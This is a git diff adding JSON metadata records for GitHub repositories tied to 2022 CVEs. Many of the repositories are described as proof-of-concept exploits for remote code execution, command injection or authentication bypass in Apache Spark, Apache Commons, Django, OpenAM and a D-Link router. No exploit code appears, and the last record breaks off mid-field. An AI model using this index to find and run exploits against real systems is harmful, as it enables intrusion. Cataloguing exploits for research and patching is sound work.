@@ +[ + { + "id": 561008998, + "name": "CVE-2022-33679", + "full_name": "Bdenneu\/CVE-2022-33679", + "owner": { + "login": "Bdenneu", + "id": 43793247, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43793247?v=4", + "html_url": "https:\/\/github.com\/Bdenneu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bdenneu\/CVE-2022-33679", + "description": "One day based on https:\/\/googleprojectzero.blogspot.com\/2022\/10\/rc4-is-still-considered-harmful.html", + "fork": false, + "created_at": "2022-11-02T18:38:01Z", + "updated_at": "2024-11-23T23:33:47Z", + "pushed_at": "2024-11-10T17:21:28Z", + "stargazers_count": 395, + "watchers_count": 395, + "has_discussions": false, + "forks_count": 69, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 69, + "watchers": 395, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 561256864, + "name": "CVE-2022-33679", + "full_name": "Blyth0He\/CVE-2022-33679", + "owner": { + "login": "Blyth0He", + "id": 12743647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12743647?v=4", + "html_url": "https:\/\/github.com\/Blyth0He", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Blyth0He\/CVE-2022-33679", + "description": "poc of CVE-2022-33679", + "fork": false, + "created_at": "2022-11-03T09:52:31Z", + "updated_at": "2023-09-20T08:03:32Z", + "pushed_at": "2022-11-03T10:02:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 561287755, + "name": "CVE-2022-33679", + "full_name": "Amulab\/CVE-2022-33679", + "owner": { + "login": "Amulab", + "id": 86412102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86412102?v=4", + "html_url": "https:\/\/github.com\/Amulab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Amulab\/CVE-2022-33679", + "description": "poc of CVE-2022-33679", + "fork": false, + "created_at": "2022-11-03T11:19:29Z", + "updated_at": "2023-05-08T16:41:17Z", + "pushed_at": "2022-11-03T11:24:27Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 566754684, + "name": "Kerberos_CVE-2022-33679", + "full_name": "notareaperbutDR34P3r\/Kerberos_CVE-2022-33679", + "owner": { + "login": "notareaperbutDR34P3r", + "id": 118025285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118025285?v=4", + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r\/Kerberos_CVE-2022-33679", + "description": null, + "fork": false, + "created_at": "2022-11-16T10:56:02Z", + "updated_at": "2022-11-24T01:09:07Z", + "pushed_at": "2023-02-10T21:24:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3368.json b/2022/CVE-2022-3368.json new file mode 100644 index 0000000000..15f77e19a3 --- /dev/null +++ b/2022/CVE-2022-3368.json @@ -0,0 +1,64 @@ +[ + { + "id": 553474071, + "name": "CVE-2022-3368", + "full_name": "Wh04m1001\/CVE-2022-3368", + "owner": { + "login": "Wh04m1001", + "id": 44291883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4", + "html_url": "https:\/\/github.com\/Wh04m1001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh04m1001\/CVE-2022-3368", + "description": null, + "fork": false, + "created_at": "2022-10-18T09:16:04Z", + "updated_at": "2024-08-12T20:27:52Z", + "pushed_at": "2022-10-18T09:30:55Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 767696686, + "name": "CrackAVFee", + "full_name": "byt3n33dl3\/CrackAVFee", + "owner": { + "login": "byt3n33dl3", + "id": 151133481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151133481?v=4", + "html_url": "https:\/\/github.com\/byt3n33dl3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byt3n33dl3\/CrackAVFee", + "description": "it's a CVE-2022-3368 (Patched), but feel free to use it for check any outdated software or reseach", + "fork": false, + "created_at": "2024-03-05T18:31:29Z", + "updated_at": "2024-11-17T16:50:59Z", + "pushed_at": "2024-07-08T16:18:51Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-33891.json b/2022/CVE-2022-33891.json new file mode 100644 index 0000000000..3043eb9eb5 --- /dev/null +++ b/2022/CVE-2022-33891.json @@ -0,0 +1,382 @@ +[ + { + "id": 515257144, + "name": "cve-2022-33891", + "full_name": "W01fh4cker\/cve-2022-33891", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/cve-2022-33891", + "description": "cve-2022-33891-poc", + "fork": false, + "created_at": "2022-07-18T16:16:51Z", + "updated_at": "2024-08-12T20:25:12Z", + "pushed_at": "2022-07-20T08:00:18Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-33891" + ], + "visibility": "public", + "forks": 22, + "watchers": 52, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 515706046, + "name": "cve-2022-33891", + "full_name": "HuskyHacks\/cve-2022-33891", + "owner": { + "login": "HuskyHacks", + "id": 57866415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57866415?v=4", + "html_url": "https:\/\/github.com\/HuskyHacks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HuskyHacks\/cve-2022-33891", + "description": "Apache Spark Shell Command Injection Vulnerability", + "fork": false, + "created_at": "2022-07-19T18:52:12Z", + "updated_at": "2024-08-26T13:05:06Z", + "pushed_at": "2022-09-07T18:12:27Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 87, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 515768225, + "name": "CVE-2022-33891", + "full_name": "west-wind\/CVE-2022-33891", + "owner": { + "login": "west-wind", + "id": 32312003, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32312003?v=4", + "html_url": "https:\/\/github.com\/west-wind", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/west-wind\/CVE-2022-33891", + "description": "Apache Spark Command Injection PoC Exploit for CVE-2022-33891", + "fork": false, + "created_at": "2022-07-19T23:16:27Z", + "updated_at": "2024-08-12T20:25:15Z", + "pushed_at": "2022-07-21T08:32:08Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-spark", + "cve-2022-33891", + "cve-2022-33891-poc", + "poc", + "spark-acls-enable", + "vulnerability", + "vulnerability-identification" + ], + "visibility": "public", + "forks": 10, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 516156505, + "name": "cve-2022-33891", + "full_name": "AkbarTrilaksana\/cve-2022-33891", + "owner": { + "login": "AkbarTrilaksana", + "id": 108668044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108668044?v=4", + "html_url": "https:\/\/github.com\/AkbarTrilaksana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkbarTrilaksana\/cve-2022-33891", + "description": null, + "fork": false, + "created_at": "2022-07-20T22:52:43Z", + "updated_at": "2022-09-19T13:06:15Z", + "pushed_at": "2024-06-18T14:07:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 517259493, + "name": "cve-2022-33891", + "full_name": "llraudseppll\/cve-2022-33891", + "owner": { + "login": "llraudseppll", + "id": 50292087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50292087?v=4", + "html_url": "https:\/\/github.com\/llraudseppll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/llraudseppll\/cve-2022-33891", + "description": "Apache Spark RCE", + "fork": false, + "created_at": "2022-07-24T07:45:46Z", + "updated_at": "2024-08-12T20:25:24Z", + "pushed_at": "2022-07-24T07:48:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-33891" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 519637095, + "name": "CVE-2022-33891", + "full_name": "AmoloHT\/CVE-2022-33891", + "owner": { + "login": "AmoloHT", + "id": 106687805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106687805?v=4", + "html_url": "https:\/\/github.com\/AmoloHT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AmoloHT\/CVE-2022-33891", + "description": "「💥」CVE-2022-33891 - Apache Spark Command Injection", + "fork": false, + "created_at": "2022-07-30T23:02:16Z", + "updated_at": "2024-08-12T20:25:43Z", + "pushed_at": "2022-08-01T21:30:09Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "code", + "code-injection", + "command", + "concept", + "cve", + "cve-2022-33891", + "exploit", + "hacking", + "injection", + "poc", + "proof", + "proof-of-concept", + "python", + "rce", + "script", + "shell", + "spark" + ], + "visibility": "public", + "forks": 6, + "watchers": 27, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 524526248, + "name": "CVE-2022-33891", + "full_name": "DrLinuxOfficial\/CVE-2022-33891", + "owner": { + "login": "DrLinuxOfficial", + "id": 88365653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88365653?v=4", + "html_url": "https:\/\/github.com\/DrLinuxOfficial", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DrLinuxOfficial\/CVE-2022-33891", + "description": "CVE-2022-33891 Exploit For Apache Spark", + "fork": false, + "created_at": "2022-08-13T23:02:56Z", + "updated_at": "2022-08-15T02:26:44Z", + "pushed_at": "2022-08-13T23:07:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 530137358, + "name": "Apache-spark-CVE-2022-33891", + "full_name": "Vulnmachines\/Apache-spark-CVE-2022-33891", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Apache-spark-CVE-2022-33891", + "description": "Apache Spark RCE - CVE-2022-33891", + "fork": false, + "created_at": "2022-08-29T08:48:38Z", + "updated_at": "2022-08-31T08:16:54Z", + "pushed_at": "2022-08-30T12:03:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 575180100, + "name": "lab_security_apache_spark_emulation_detection", + "full_name": "ps-interactive\/lab_security_apache_spark_emulation_detection", + "owner": { + "login": "ps-interactive", + "id": 35313392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35313392?v=4", + "html_url": "https:\/\/github.com\/ps-interactive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ps-interactive\/lab_security_apache_spark_emulation_detection", + "description": "For CVE-2022-33891 Apache Spark: Emulation and Detection by West Shepherd", + "fork": false, + "created_at": "2022-12-06T23:44:30Z", + "updated_at": "2024-08-19T21:35:03Z", + "pushed_at": "2024-08-19T21:35:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 723685053, + "name": "cve-2022-33891-fix", + "full_name": "elsvital\/cve-2022-33891-fix", + "owner": { + "login": "elsvital", + "id": 4923784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4923784?v=4", + "html_url": "https:\/\/github.com\/elsvital", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elsvital\/cve-2022-33891-fix", + "description": null, + "fork": false, + "created_at": "2023-11-26T13:09:28Z", + "updated_at": "2023-11-26T13:47:47Z", + "pushed_at": "2023-11-26T13:52:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 761826205, + "name": "CVE-2022-33891-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2022-33891-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2022-33891-EXPLOIT", + "description": "A PoC exploit for CVE-2022-33891 - Apache Spark UI Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-02-22T15:05:00Z", + "updated_at": "2024-08-03T02:02:52Z", + "pushed_at": "2024-02-22T16:19:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve-2022-33891", + "cve-2022-33891-poc", + "exploit", + "hacking", + "poc", + "remote-code-execution" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-33980.json b/2022/CVE-2022-33980.json new file mode 100644 index 0000000000..c7968fd12f --- /dev/null +++ b/2022/CVE-2022-33980.json @@ -0,0 +1,160 @@ +[ + { + "id": 511837211, + "name": "CVE-2022-33980-Apache-Commons-Configuration-RCE", + "full_name": "tangxiaofeng7\/CVE-2022-33980-Apache-Commons-Configuration-RCE", + "owner": { + "login": "tangxiaofeng7", + "id": 45926593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926593?v=4", + "html_url": "https:\/\/github.com\/tangxiaofeng7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tangxiaofeng7\/CVE-2022-33980-Apache-Commons-Configuration-RCE", + "description": "CVE-2022-33980 Apache Commons Configuration 远程命令执行漏洞", + "fork": false, + "created_at": "2022-07-08T09:25:42Z", + "updated_at": "2024-08-12T20:24:50Z", + "pushed_at": "2022-07-08T09:27:48Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 40, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 523185323, + "name": "CVE-2022-33980", + "full_name": "HKirito\/CVE-2022-33980", + "owner": { + "login": "HKirito", + "id": 40173190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40173190?v=4", + "html_url": "https:\/\/github.com\/HKirito", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HKirito\/CVE-2022-33980", + "description": "CVE", + "fork": false, + "created_at": "2022-08-10T03:21:19Z", + "updated_at": "2024-08-12T20:26:02Z", + "pushed_at": "2022-10-20T09:00:26Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-33980", + "cve-2022-42889" + ], + "visibility": "public", + "forks": 11, + "watchers": 32, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 553195331, + "name": "CVE-2022-33980-POC", + "full_name": "sammwyy\/CVE-2022-33980-POC", + "owner": { + "login": "sammwyy", + "id": 44925968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44925968?v=4", + "html_url": "https:\/\/github.com\/sammwyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sammwyy\/CVE-2022-33980-POC", + "description": "POC for CVE-2022-33980 (Apache Commons Configuration RCE vulnerability)", + "fork": false, + "created_at": "2022-10-17T21:39:03Z", + "updated_at": "2023-05-30T08:44:33Z", + "pushed_at": "2022-10-17T21:45:54Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 581117627, + "name": "CVE-2022-33980-POC", + "full_name": "P0lar1ght\/CVE-2022-33980-POC", + "owner": { + "login": "P0lar1ght", + "id": 92381585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92381585?v=4", + "html_url": "https:\/\/github.com\/P0lar1ght", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/P0lar1ght\/CVE-2022-33980-POC", + "description": null, + "fork": false, + "created_at": "2022-12-22T10:16:08Z", + "updated_at": "2024-05-20T07:48:59Z", + "pushed_at": "2022-12-22T10:18:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 667968718, + "name": "riskootext4shell", + "full_name": "joseluisinigo\/riskootext4shell", + "owner": { + "login": "joseluisinigo", + "id": 7033429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7033429?v=4", + "html_url": "https:\/\/github.com\/joseluisinigo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joseluisinigo\/riskootext4shell", + "description": "text4shell script for text coomons < =1.10 CVE-2022-33980", + "fork": false, + "created_at": "2023-07-18T17:55:58Z", + "updated_at": "2023-07-18T20:20:09Z", + "pushed_at": "2023-07-18T17:58:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34024.json b/2022/CVE-2022-34024.json new file mode 100644 index 0000000000..26054f84ce --- /dev/null +++ b/2022/CVE-2022-34024.json @@ -0,0 +1,33 @@ +[ + { + "id": 502839678, + "name": "bug_report", + "full_name": "sorabug\/bug_report", + "owner": { + "login": "sorabug", + "id": 45709238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45709238?v=4", + "html_url": "https:\/\/github.com\/sorabug", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sorabug\/bug_report", + "description": "CVE-2022-34024", + "fork": false, + "created_at": "2022-06-13T06:52:56Z", + "updated_at": "2023-04-20T02:30:21Z", + "pushed_at": "2022-06-13T07:08:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34169.json b/2022/CVE-2022-34169.json new file mode 100644 index 0000000000..2841207bcf --- /dev/null +++ b/2022/CVE-2022-34169.json @@ -0,0 +1,64 @@ +[ + { + "id": 524931119, + "name": "CVE-2022-34169", + "full_name": "bor8\/CVE-2022-34169", + "owner": { + "login": "bor8", + "id": 5301068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5301068?v=4", + "html_url": "https:\/\/github.com\/bor8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bor8\/CVE-2022-34169", + "description": "https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-34169", + "fork": false, + "created_at": "2022-08-15T09:43:08Z", + "updated_at": "2022-11-09T11:20:23Z", + "pushed_at": "2022-09-01T09:26:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589838604, + "name": "AutoGenerateXalanPayload", + "full_name": "flowerwind\/AutoGenerateXalanPayload", + "owner": { + "login": "flowerwind", + "id": 35595721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35595721?v=4", + "html_url": "https:\/\/github.com\/flowerwind", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flowerwind\/AutoGenerateXalanPayload", + "description": "cve-2022-34169 延伸出的Jdk Xalan的payload自动生成工具,可根据不同的Jdk生成出其所对应的xslt文件", + "fork": false, + "created_at": "2023-01-17T03:48:11Z", + "updated_at": "2024-11-26T12:57:54Z", + "pushed_at": "2023-01-17T12:27:08Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 88, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34265.json b/2022/CVE-2022-34265.json new file mode 100644 index 0000000000..68f4ee5adf --- /dev/null +++ b/2022/CVE-2022-34265.json @@ -0,0 +1,126 @@ +[ + { + "id": 511432180, + "name": "CVE-2022-34265", + "full_name": "aeyesec\/CVE-2022-34265", + "owner": { + "login": "aeyesec", + "id": 61375985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61375985?v=4", + "html_url": "https:\/\/github.com\/aeyesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aeyesec\/CVE-2022-34265", + "description": "PoC for CVE-2022-34265 (Django)", + "fork": false, + "created_at": "2022-07-07T07:45:28Z", + "updated_at": "2024-08-12T20:24:48Z", + "pushed_at": "2022-07-30T07:53:43Z", + "stargazers_count": 123, + "watchers_count": 123, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 123, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 513523694, + "name": "CVE-2022-34265", + "full_name": "traumatising\/CVE-2022-34265", + "owner": { + "login": "traumatising", + "id": 109222893, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109222893?v=4", + "html_url": "https:\/\/github.com\/traumatising", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/traumatising\/CVE-2022-34265", + "description": "CVE-2022-34265 Vulnerability ", + "fork": false, + "created_at": "2022-07-13T13:02:41Z", + "updated_at": "2022-07-17T10:07:36Z", + "pushed_at": "2022-07-13T13:07:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 528313090, + "name": "CVE-2022-34265", + "full_name": "ZhaoQi99\/CVE-2022-34265", + "owner": { + "login": "ZhaoQi99", + "id": 25344334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25344334?v=4", + "html_url": "https:\/\/github.com\/ZhaoQi99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZhaoQi99\/CVE-2022-34265", + "description": "PoC for CVE-2022-34265", + "fork": false, + "created_at": "2022-08-24T07:29:30Z", + "updated_at": "2023-02-14T21:32:51Z", + "pushed_at": "2022-08-26T03:28:01Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 534397698, + "name": "CTF_Django_CVE-2022-34265", + "full_name": "lnwza0x0a\/CTF_Django_CVE-2022-34265", + "owner": { + "login": "lnwza0x0a", + "id": 96345719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96345719?v=4", + "html_url": "https:\/\/github.com\/lnwza0x0a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lnwza0x0a\/CTF_Django_CVE-2022-34265", + "description": null, + "fork": false, + "created_at": "2022-09-08T21:22:28Z", + "updated_at": "2022-10-07T11:01:14Z", + "pushed_at": "2022-09-08T22:10:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34298.json b/2022/CVE-2022-34298.json new file mode 100644 index 0000000000..685f73543e --- /dev/null +++ b/2022/CVE-2022-34298.json @@ -0,0 +1,33 @@ +[ + { + "id": 506285986, + "name": "CVE-2022-34298", + "full_name": "watchtowrlabs\/CVE-2022-34298", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/CVE-2022-34298", + "description": "PoC exploit for CVE-2022-34298, OpenAM authentication bypass", + "fork": false, + "created_at": "2022-06-22T14:38:59Z", + "updated_at": "2023-08-14T09:47:31Z", + "pushed_at": "2022-06-22T14:40:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34527.json b/2022/CVE-2022-34527.json new file mode 100644 index 0000000000..5955ac475c --- /dev/null +++ b/2022/CVE-2022-34527.json @@ -0,0 +1,33 @@ +[ + { + "id": 629316987, + "name": "CVE-2022-34527_D-Link_DSL-3782_Router_command_injection", + "full_name": "FzBacon\/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection", + "owner": { + "login": "FzBacon", + "id": 48304150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48304150?v=4", + "html_url": "https:\/\/github.com\/FzBacon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FzBacon\/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection", + "description": null, + "fork": false, + "created_at": "2023-04-18T04:26:49Z", + "updated_at": "2023-04-18T04:27:04Z", + "pushed_at": "2023-04-18T10:48:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34556.json b/2022/CVE-2022-34556.json new file mode 100644 index 0000000000..b8473bb306 --- /dev/null +++ b/2022/CVE-2022-34556.json @@ -0,0 +1,33 @@ +[ + { + "id": 595824795, + "name": "CVE-2022-34556", + "full_name": "Halcy0nic\/CVE-2022-34556", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-34556", + "description": "Proof of concept for CVE-2022-34556", + "fork": false, + "created_at": 